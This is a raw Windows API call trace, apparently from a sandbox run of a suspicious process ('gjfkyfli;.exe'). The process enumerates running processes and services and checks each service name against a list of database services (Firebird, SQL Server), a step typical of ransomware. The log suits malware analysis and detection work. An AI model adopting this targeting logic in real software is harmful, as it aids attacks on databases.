	[0170.732] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0170.732] lstrlenW (lpString="taskhost.exe") returned 12
	[0170.732] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0170.733] lstrlenW (lpString="dwm.exe") returned 7
	[0170.733] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0170.733] lstrlenW (lpString="explorer.exe") returned 12
	[0170.733] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0170.733] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0170.734] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0170.734] lstrlenW (lpString="reader_sl.exe") returned 13
	[0170.734] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0170.734] lstrlenW (lpString="taskhost.exe") returned 12
	[0170.734] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0170.735] lstrlenW (lpString="dllhost.exe") returned 11
	[0170.735] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0170.735] lstrlenW (lpString="dllhost.exe") returned 11
	[0170.735] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="rundll32.exe")) returned 1
	[0170.735] lstrlenW (lpString="rundll32.exe") returned 12
	[0170.735] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="dinotify.exe")) returned 1
	[0170.736] lstrlenW (lpString="dinotify.exe") returned 12
	[0170.736] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0170.736] lstrlenW (lpString="dllhost.exe") returned 11
	[0170.736] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0170.736] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0170.736] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 0
	[0170.737] CloseHandle (hObject=0x354) returned 1
	[0170.737] Sleep (dwMilliseconds=0x1f4) 
	[0171.397] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb51c710
	[0171.420] EnumServicesStatusExW (in: hSCManager=0xb51c710, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0171.420] GetLastError () returned 0xea
	[0171.420] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x11e4) returned 0xb617698
	[0171.421] EnumServicesStatusExW (in: hSCManager=0xb51c710, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb617698, cbBufSize=0x11e4, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb617698, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0171.421] CloseServiceHandle (hSCObject=0xb51c710) returned 1
	[0171.421] lstrlenW (lpString="Appinfo") returned 7
	[0171.421] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0171.421] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0171.421] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0171.421] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0171.421] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0171.421] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0171.421] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0171.421] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0171.421] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0171.422] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0171.422] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0171.422] lstrlenW (lpString="AudioSrv") returned 8
	[0171.422] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0171.422] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0171.422] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0171.422] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0171.422] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0171.422] lstrlenW (lpString="BFE") returned 3
	[0171.422] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0171.422] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0171.422] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0171.422] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0171.422] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0171.422] lstrlenW (lpString="CryptSvc") returned 8
	[0171.422] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0171.422] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0171.422] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0171.422] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0171.422] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0171.422] lstrlenW (lpString="CscService") returned 10
	[0171.422] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0171.422] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0171.422] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0171.422] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0171.422] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0171.422] lstrlenW (lpString="DcomLaunch") returned 10
	[0171.422] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0171.422] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0171.422] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0171.423] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0171.423] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0171.423] lstrlenW (lpString="Dhcp") returned 4
	[0171.423] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0171.423] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0171.423] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0171.423] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0171.423] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0171.423] lstrlenW (lpString="Dnscache") returned 8
	[0171.423] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0171.423] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0171.423] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0171.423] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0171.423] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0171.423] lstrlenW (lpString="DPS") returned 3
	[0171.423] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0171.423] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0171.423] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0171.423] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0171.423] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0171.423] lstrlenW (lpString="eventlog") returned 8
	[0171.423] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0171.423] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0171.423] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0171.423] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0171.423] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0171.423] lstrlenW (lpString="EventSystem") returned 11
	[0171.423] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0171.423] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0171.423] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0171.423] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0171.423] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0171.424] lstrlenW (lpString="gpsvc") returned 5
	[0171.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0171.424] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0171.424] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0171.424] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0171.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0171.424] lstrlenW (lpString="iphlpsvc") returned 8
	[0171.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0171.424] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0171.424] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0171.424] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0171.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0171.424] lstrlenW (lpString="LanmanServer") returned 12
	[0171.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0171.424] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0171.424] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0171.424] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0171.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0171.424] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0171.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0171.424] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0171.424] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0171.424] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0171.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0171.424] lstrlenW (lpString="lmhosts") returned 7
	[0171.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0171.424] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0171.424] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0171.424] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0171.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0171.424] lstrlenW (lpString="MMCSS") returned 5
	[0171.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0171.425] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0171.425] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0171.425] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0171.425] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0171.425] lstrlenW (lpString="MpsSvc") returned 6
	[0171.425] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0171.425] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0171.425] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0171.425] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0171.425] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0171.425] lstrlenW (lpString="Netman") returned 6
	[0171.425] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0171.425] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0171.425] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0171.425] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0171.425] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0171.425] lstrlenW (lpString="netprofm") returned 8
	[0171.425] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0171.425] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0171.425] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0171.425] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0171.425] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0171.425] lstrlenW (lpString="NlaSvc") returned 6
	[0171.425] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0171.425] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0171.425] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0171.425] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0171.425] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0171.425] lstrlenW (lpString="nsi") returned 3
	[0171.425] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0171.425] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0171.425] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0171.426] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0171.426] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0171.426] lstrlenW (lpString="PcaSvc") returned 6
	[0171.426] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0171.426] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0171.426] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0171.426] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0171.426] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0171.426] lstrlenW (lpString="PlugPlay") returned 8
	[0171.426] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0171.426] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0171.426] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0171.426] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0171.426] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0171.426] lstrlenW (lpString="Power") returned 5
	[0171.426] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0171.426] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0171.426] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0171.426] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0171.426] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0171.426] lstrlenW (lpString="ProfSvc") returned 7
	[0171.426] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0171.426] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0171.426] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0171.426] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0171.426] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0171.426] lstrlenW (lpString="RpcEptMapper") returned 12
	[0171.426] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0171.426] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0171.426] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0171.426] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0171.427] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0171.427] lstrlenW (lpString="RpcSs") returned 5
	[0171.427] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0171.427] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0171.427] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0171.427] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0171.427] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0171.427] lstrlenW (lpString="SamSs") returned 5
	[0171.427] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0171.427] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0171.427] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0171.427] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0171.427] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0171.427] lstrlenW (lpString="Schedule") returned 8
	[0171.427] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0171.427] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0171.427] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0171.427] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0171.427] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0171.427] lstrlenW (lpString="SENS") returned 4
	[0171.427] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0171.427] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0171.427] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0171.427] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0171.427] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0171.427] lstrlenW (lpString="ShellHWDetection") returned 16
	[0171.427] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0171.427] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0171.427] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0171.427] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0171.427] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0171.427] lstrlenW (lpString="Spooler") returned 7
	[0171.428] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0171.428] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0171.428] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0171.428] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0171.428] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0171.428] lstrlenW (lpString="SysMain") returned 7
	[0171.428] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0171.428] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0171.428] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0171.428] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0171.428] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0171.428] lstrlenW (lpString="Themes") returned 6
	[0171.428] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0171.428] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0171.428] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0171.428] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0171.428] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0171.428] lstrlenW (lpString="TrkWks") returned 6
	[0171.428] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0171.429] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0171.429] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0171.429] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0171.429] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0171.429] lstrlenW (lpString="UxSms") returned 5
	[0171.429] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0171.429] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0171.429] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0171.429] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0171.429] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0171.429] lstrlenW (lpString="WdiServiceHost") returned 14
	[0171.429] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0171.429] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0171.429] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0171.429] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0171.429] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0171.429] lstrlenW (lpString="WdiSystemHost") returned 13
	[0171.429] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0171.429] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0171.429] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0171.429] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0171.429] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0171.429] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0171.429] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0171.429] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0171.429] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0171.429] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0171.429] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0171.430] lstrlenW (lpString="Winmgmt") returned 7
	[0171.430] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0171.430] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0171.430] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0171.430] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0171.430] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0171.430] lstrlenW (lpString="WPDBusEnum") returned 10
	[0171.430] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
